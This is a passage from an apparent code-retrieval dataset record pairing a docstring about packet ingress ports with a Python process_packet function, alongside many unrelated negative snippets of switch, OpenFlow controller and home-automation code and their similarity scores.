'{url_prefix}://{switch_name_or_ip}:{port}/networks/{vlan}/{network_id}/{port_id}'\n for _switchport in _switch.get('ports'):\n _request = requests.delete(\n BRIDGE_PORT_URL.format(url_prefix=self.url_prefix,\n port=self.protocol_port,\n switch_name_or_ip=_switch.get('name'),\n vlan=unicode(_vlanid),\n network_id=_network,\n port_id=_switchport)\n )\n LOG.info(\n _LI('Sending DELETE API Call to Switch %s'),\n _request.url\n )\n if _request.status_code != requests.codes.ok:\n LOG.error(\n _LE(\"Failed To Provision Switch %s\"), _request.text)\n raise MechanismDriverError()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def disable(name):\n if name in enabledStreams:\n stream = enabledStreams[name]\n del enabledStreams[name]\n print(\"Disabled {} ({})\".format(name, stream.get_NSVCA()))", "def turn_off(self):\n self._state = False\n self.write_state(bytes([1]))\n self.schedule_update_ha_state()", "def disable_everything(self):\n zhinst.utils.disable_everything(self.daq, self.device_id)\n self.log.info(\"Disabled everything.\")", "def disable(self):\n self.rx.threadKill()\n self.tx.threadKill()\n time.sleep(1)\n self.fisica.close()", "def disable_irq() -> int:", "def on_disable(self) -> None:\n self._cancel_automation()", "def disable(self):\n return self.enable(False)", "def disable(self):\n disable_request = self._commcell_object._services['DISABLE_SCHEDULE']\n\n request_text = \"taskId={0}\".format(self.schedule_policy_id)\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'POST', disable_request, request_text)\n\n if flag:\n if response.json():\n error_code = str(response.json()['errorCode'])\n\n if error_code == \"0\":\n return\n else:\n error_message = 'Failed to disable Schedule Policy'\n\n if 'errorMessage' in response.json():\n error_message = \"{0}\\nError: {1}\".format(error_message, response.json()['errorMessage'])\n\n raise SDKException('Schedules', '102', error_message)\n\n else:\n raise SDKException('Response', '102')\n\n response_string = self._commcell_object._update_response_(\n response.text)\n raise SDKException('Response', '101', response_string)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Disable(self, request, global_params=None):\n config = self.GetMethodConfig('Disable')\n return self._RunMethod(\n config, request, global_params=global_params)", "def StopStatelessTrafficBlocking(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n payload = { \"Arg1\": self }\n for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]\n for item in kwargs.items(): payload[item[0]] = item[1]\n return self._execute('stopStatelessTrafficBlocking', payload=payload, response_object=None)", "def disable(self):\r\n self.update(enabled=False)", "def off(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n if self._pre_off_func:\n self._pre_off_func()\n switchboard = self._get_switchboard_if_initialized()\n if self._power_and_data_share_cable:\n if switchboard:\n switchboard.add_log_note(\n f\"comm_power.off() called on {self._device_name} set communication \"\n f\"port {self.port_number} to charge as device has a single USB \"\n \"cable for data and power.\")\n switchboard.close_all_transports()\n self._hub.switch_power.power_on(self.port_number, data_sync=False)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(\n self.secondary_port_number, data_sync=False)\n else:\n if switchboard:\n switchboard.close_all_transports()\n self._hub.switch_power.power_off(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_off(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_off()", "def shutdown(self):\n self.disable_modulation()\n self.disable()\n super().shutdown()", "def disable(self) -> None:\n if self.active_mode is not None:\n logger.info(\"Disabling '%s'\", self.active_mode.MODE_NAME)\n self.active_mode.on_disable()\n\n self.active_mode = None", "def disable():\n configdb = ConfigDBConnector()\n configdb.connect()\n port_info = {}\n port_info['FLEX_COUNTER_STATUS'] = DISABLE\n configdb.mod_entry(\"FLEX_COUNTER_TABLE\", PORT_BUFFER_DROP, port_info)", "def turn_off(self, **kwargs):\n self._is_on = False\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 0)", "def disable(self, sid):\n return", "def stop(self):\n self.running = False\n self.hop_channel(\"auto\")", "def turn_off(self):\n GPIO.output(self.gpio, False) # turn off light" ]
[ "0.66462976", "0.6192181", "0.6160286", "0.6113852", "0.6101358", "0.6030463", "0.6019299", "0.60160685", "0.6007818", "0.59888124", "0.5958932", "0.59445566", "0.5917474", "0.591579", "0.5867535", "0.5856679", "0.5840998", "0.583786", "0.58215153", "0.57709235", "0.5764594", "0.573368", "0.57228184", "0.57125336", "0.5711457", "0.5710529", "0.570228", "0.5700118", "0.56883967", "0.5661413", "0.56514955", "0.5648237", "0.5642898", "0.56314486", "0.56305003", "0.562342", "0.56224227", "0.5604275", "0.5595896", "0.5595237", "0.5567986", "0.55650157", "0.5552575", "0.5551788", "0.55504745", "0.5531258", "0.5529216", "0.55288035", "0.5527847", "0.55232376", "0.55224687", "0.5503649", "0.5482746", "0.54747134", "0.54744893", "0.54707754", "0.5449039", "0.54463845", "0.5442789", "0.54331887", "0.5424108", "0.5412981", "0.540464", "0.5390647", "0.5385855", "0.53795785", "0.53773934", "0.5370801", "0.5369836", "0.53559035", "0.5348963", "0.53279316", "0.5327846", "0.5327674", "0.53270185", "0.53208363", "0.5320338", "0.5318188", "0.5316621", "0.52965117", "0.5291853", "0.5287278", "0.52859503", "0.5282649", "0.5281748", "0.5280178", "0.52786607", "0.5275447", "0.5275447", "0.5275447", "0.5273711", "0.52697647", "0.5269579", "0.52682996", "0.5250305", "0.52331185", "0.52331", "0.5226781", "0.52264607", "0.5221016" ]
0.70145595
0
in_port The ingress port number on which packet arrived packet A bytearray with the packet data
def process_packet(self, in_port, packet): buf = bytearray(packet) for idx in range((len(packet) + 19)/20): logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20)) if self.disabled: logging.debug("Switch is disabled; discarding packet") return parsed_packet = ParsedPacket(buf, self.metadata) logging.debug("Processing packet %d from port %d with %s" % (parsed_packet.id, in_port, self.first_processor.name)) self.first_processor.process(parsed_packet)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def port_in(self, port_in):\n\n self._port_in = port_in", "def port_in(self, port_in):\n\n self._port_in = port_in", "def _packet_in_debug(self, ev, in_port):\n #*** Extract parameters:\n msg = ev.msg\n datapath = msg.datapath\n dpid = datapath.id\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n eth_src = eth.src\n eth_dst = eth.dst\n pkt_ip4 = pkt.get_protocol(ipv4.ipv4)\n pkt_ip6 = pkt.get_protocol(ipv6.ipv6)\n pkt_tcp = pkt.get_protocol(tcp.tcp)\n\n #*** Some debug about the Packet In:\n if pkt_ip4 and pkt_tcp:\n self.logger.debug(\"event=pi_ipv4_tcp dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s tcp_src=%s \"\n \"tcp_dst=%s\",\n dpid, in_port, pkt_ip4.src, pkt_ip4.dst,\n pkt_tcp.src_port, pkt_tcp.dst_port)\n elif pkt_ip6 and pkt_tcp:\n self.logger.debug(\"event=pi_ipv6_tcp dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s tcp_src=%s \"\n \"tcp_dst=%s\",\n dpid, in_port, pkt_ip6.src, pkt_ip6.dst,\n pkt_tcp.src_port, pkt_tcp.dst_port)\n elif pkt_ip4:\n self.logger.debug(\"event=pi_ipv4 dpid=\"\n \"%s in_port=%s ip_src=%s ip_dst=%s proto=%s\",\n dpid, in_port,\n pkt_ip4.src, pkt_ip4.dst, pkt_ip4.proto)\n elif pkt_ip6:\n self.logger.debug(\"event=pi_ipv6 dpid=%s \"\n \"in_port=%s ip_src=%s ip_dst=%s\",\n dpid, in_port,\n pkt_ip6.src, pkt_ip6.dst)\n else:\n self.logger.debug(\"event=pi_other dpid=%s \"\n \"in_port=%s eth_src=%s eth_dst=%s eth_type=%s\",\n dpid, in_port, eth_src, eth_dst, eth.ethertype)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n port = msg.match['in_port']\n gateway = self.gateway_get(datapath.id)\n\n if gateway is None:# or gateway.idc_id != CONF.idc_id:\n return\n\n pkt = packet.Packet(msg.data)\n pkt_ethernet = pkt.get_protocol(ethernet.ethernet)\n\n if not pkt_ethernet:\n LOG.info(_LI(\"drop non-ethernet packet\"))\n return\n\n pkt_arp = pkt.get_protocol(arp.arp)\n pkt_ipv4 = pkt.get_protocol(ipv4.ipv4)\n\n if pkt_arp:\n self.packet_arp.run(msg, pkt_ethernet, pkt_arp, gateway)\n elif pkt_ipv4:\n pkt_tp = pkt.get_protocol(tcp.tcp) or \\\n pkt.get_protocol(udp.udp) or \\\n pkt.get_protocol(icmp.icmp)\n\n if pkt.get_protocol(icmp.icmp):\n LOG.error(\"packet-in msg %s %s %s from %s\", datapath.id, pkt_ipv4, pkt_tp, port)\n LOG.debug(\"packet-in msg %s %s %s from %s\", \n datapath.id, pkt_ipv4, pkt_tp, port)\n\n if pkt_tp and port:\n self.packet_ipv4.run(msg, pkt_ethernet, pkt_ipv4, pkt_tp, gateway)\n else:\n LOG.debug(_LI(\"drop non-arp and non-ip packet\"))", "def _handle_PacketIn (self, event):\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"%i %i ignoring unparsed packet\", dpid, inport)\n return\n \n if packet.type == ethernet.LLDP_TYPE:\n # Ignore LLDP packets\n return\n\n # self.act_like_hub(packet, packet_in)\n\n arpp = packet.find('arp')\n if arpp is not None:\n arp_type = \"unknown\"\n if arpp.opcode == arp.REQUEST:\n arp_type = \"request\"\n # return\n # NOTE: in a triangle topology, forwarding arp requests is not necessary\n # but it may be if topology changes\n elif arpp.opcode == arp.REPLY:\n arp_type = \"reply\"\n log.info(\"ARP %s for dst %s from source %s recieved by switch %d on port %d\", \n arp_type, arpp.protodst, arpp.protosrc, self.dpid, event.port)\n self.act_like_switch(packet, packet_in, event.port)\n # # Learn IP to MAC address mapping.\n # if self._mac_learn(packet.src, arpp.protosrc):\n # log.info(\"switch %s learned %s -> %s by ARP\", self.dpid, arpp.protosrc, packet.src)\n # # dpid = event.connection.dpid\n # inport = event.port \n # if packet.src not in self.mac_to_port:\n # self.mac_to_port[packet.src] = inport\n # # Respond to ARP request if appropriate.\n # if arpp.opcode == arp.REQUEST and ipinfo(arpp.protosrc)[0] == 1:\n # log.info(\"ARP request for dst %s from source %s recieved by switch %d on port %d\", arpp.protodst, arpp.protosrc, self.dpid, inport)\n # e = self._arp_response_pkt(arpp, packet)\n # msg = of.ofp_packet_out()\n # msg.data = e.pack()\n # msg.actions.append(of.ofp_action_output(port = of.OFPP_IN_PORT))\n # msg.in_port = inport\n # event.connection.send(msg)\n\n ipp = packet.find('ipv4')\n if ipp is not None:\n log.info(\"IP packet received by switch %d on port %d. src is %s, dst is %s\",\n self._id, event.port, ipp.srcip, ipp.dstip)\n self.act_like_switch(packet, packet_in, event.port)", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n self.do_final(packet, packet_in, event.port, event.dpid)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def act_like_hub (self, packet, packet_in):\n # We want to output to all ports -- we do that using the special\n # OFPP_ALL port as the output port. (We could have also used\n # OFPP_FLOOD.)\n self.resend_packet(packet_in, of.OFPP_ALL)\n\n # Note that if we didn't get arp_req valid buffer_id, arp_req slightly better\n # implementation would check that we got the full data before\n # sending it (len(packet_in.data) should be == packet_in.total_len)).", "def _handle_PacketIn (self, event):\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n \n self.do_firewall(packet, packet_in, event)", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.phasedarray_sptr_message_ports_in(self)", "def outReceived(self, data):\n if data[0:4] == \"port\":\n port = data.split(':')[1]\n self.deferred.callback(port)", "def FlowStatInPort(self):\n\t\treturn self._get_attribute('flowStatInPort')", "def in_aux_port(self, port):\n port = ct.c_int(port)\n state = ct.c_int()\n self.lib.InAuxPort(port, ct.pointer(state))\n return state.value", "def message_ports_in(self):\n return _spacegrant_swig.ax25_pdu_packer_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr_message_ports_in(self)", "def _handle_PacketIn(self, event):\n msg = of.ofp_packet_out()\n msg.data = event.ofp\n msg.in_port = event.port\n msg.actions.append(of.ofp_action_output(port=of.OFPP_FLOOD))\n event.connection.send(msg)", "def out_aux_port(self, port):\n return self.auxout[port - 1]", "def message_ports_in(self):\n return _spacegrant_swig.G3RUH_descramble_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _uhd_swig.usrp_sink_sptr_message_ports_in(self)", "def port_out(self) -> int:\n return self.proto.port_out", "def out_data(self, port: int) -> Optional[Any]:\n try:\n return copy(self.outputs[port])\n except:\n return None", "def message_ports_in(self):\n return _spacegrant_swig.ax25_udp_pdu_receiver_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.NRZI_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.binary_sink_sptr_message_ports_in(self)", "def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = msg.datapath.ofproto\n dpid = datapath.id\n switch = self.switches[dpid]\n in_port = msg.match['in_port']\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n #*** TBD, deal with context:\n context = self.context_default\n\n #*** Extra debug if syslog or console logging set to DEBUG:\n if self.debug_on:\n self._packet_in_debug(ev, in_port)\n\n #*** Is it a DPAE Join request? If so, call function to handle it:\n if eth.src == self.ctrl2dpae_mac and eth.dst == self.dpae2ctrl_mac:\n self.dpae_join(pkt, datapath, in_port)\n return 1\n\n self.logger.info(\"Learned mac=%s dpid=%s port=%s\",\n eth.src, dpid, in_port)\n\n #*** Add to MAC/port pair to switch MAC table:\n switch.mactable.add(eth.src, in_port, context)\n\n #*** In active mode with a DPAE, we need to add an AMF flow entry:\n if self.main_policy.tc_policies.mode == 'active':\n #*** Look the DPID up in the database:\n db_result = 